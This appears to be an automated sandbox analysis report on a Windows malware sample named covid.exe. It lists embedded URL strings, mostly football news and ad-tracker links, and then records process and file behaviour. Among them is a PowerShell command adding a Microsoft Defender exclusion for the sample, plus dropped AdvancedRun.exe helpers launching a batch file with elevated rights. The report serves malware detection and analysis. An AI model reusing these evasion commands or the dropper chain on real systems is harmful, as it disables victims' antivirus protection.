Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: covid.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_02FFCF0815_2_02FFCF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_02FF278015_2_02FF2780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_02FFCEF815_2_02FFCEF8
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
Source: covid.exeStatic PE information: invalid certificate
Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: covid.exe, 00000000.00000000.229590420.0000000000462000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: covid.exeBinary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: classification engineClassification label: mal68.evad.winEXE@15/17@1/2
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,5_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,7_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,5_2_004095FD
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,5_2_0040A33B
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwmJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ecJump to behavior
Source: covid.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\covid.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: covid.exeVirustotal: Detection: 40%
Source: covid.exeReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\covid.exe:Zone.IdentifierJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -ForceJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -ForceJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: covid.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: covid.exeStatic PE information: 0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0040289F
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret 5_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret 5_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040B50D push ecx; ret 5_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeJump to dropped file
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeJump to dropped file
